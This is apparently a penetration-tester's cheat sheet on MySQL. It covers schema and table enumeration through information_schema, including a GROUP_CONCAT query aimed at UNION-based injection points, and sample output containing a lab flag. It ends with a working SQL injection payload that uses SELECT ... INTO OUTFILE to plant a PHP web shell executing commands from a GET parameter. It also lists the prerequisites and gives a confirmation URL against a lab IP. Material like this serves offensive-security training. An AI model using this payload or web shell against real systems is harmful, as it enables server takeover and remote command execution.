MySQL
Connecting to Remote Server
mysql -u user -p -h ip_address
Verify Current User
select system_user();
Show Databases
show databases;
Select Database to Query
use <db_name>;
Show Tables
show tables;
Show Just Column Names in Specific Table
select column_name from information_schema.columns where table_name = 'users';
+---------------------+
| COLUMN_NAME         |
+---------------------+
| CURRENT_CONNECTIONS |
| TOTAL_CONNECTIONS   |
| USER                |
| id                  |
| username            |
+---------------------+
- Note that without a table_schema condition this matches every schema that contains a table named users: the first three rows above come from performance_schema.users, not from the application table. Add a table_schema filter to restrict the result to the selected database.
Selecting Specific Items from Table
select id,username from users;
+----+--------------------------------------+
| id | username                             |
+----+--------------------------------------+
|  1 | yoshi                                |
|  2 | luigi                                |
|  3 | wario                                |
|  4 | OS{5a8b9b9bf9b8b4c0e85b81aa63cb4b15} |
|  5 | mario                                |
+----+--------------------------------------+
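The enumeration queries above, scoped to the database selected with USE so that same-named tables in other schemas (such as performance_schema.users) do not pollute the output. This is an added example, not part of the original page; the table and column names (users, id, username) are the page's own, everything else is standard MySQL.

```sql
-- Added example: scoped schema enumeration (not from the original page).

-- Tables in the currently selected database only
SELECT table_name
FROM information_schema.tables
WHERE table_schema = DATABASE();

-- Columns of 'users' in the currently selected database only,
-- in the order they are defined in the table
SELECT column_name, data_type
FROM information_schema.columns
WHERE table_schema = DATABASE()
  AND table_name = 'users'
ORDER BY ordinal_position;

-- The same information collapsed into one string, which is useful when an
-- injection point echoes only a single column back through UNION SELECT
SELECT GROUP_CONCAT(CONCAT(table_name, '.', column_name) SEPARATOR ', ')
FROM information_schema.columns
WHERE table_schema = DATABASE();
```

GROUP_CONCAT output is truncated at group_concat_max_len (1024 bytes by default), so on a database with many columns, filter by table_name or raise the limit for the session before relying on it.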
Writing Files on the Web Server
- Although the various MySQL database variants don't offer a single function to escalate to RCE, we can abuse the SELECT ... INTO OUTFILE statement to write files on the web server.
- The target directory MUST be writable by the OS user running the database server (usually mysql), the file must not already exist (INTO OUTFILE refuses to overwrite), the MySQL account needs the FILE privilege, and the secure_file_priv setting must not restrict writes to another directory.
Example VIA UNION SELECT Statement
- We'll issue the UNION SELECT SQL keywords to include a single PHP line in the first column and save it as webshell.php in a writable web folder. The number of columns in the UNION (five here) must match the number of columns in the original query.
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
Written PHP Code
<?php system($_GET['cmd']);?>
- The PHP system function executes whatever command is passed in the cmd parameter of the client's HTTP GET request, so the file acts as a web-interactive command shell.
Confirming Web Shell
http://192.168.120.19/tmp/webshell.php?cmd=id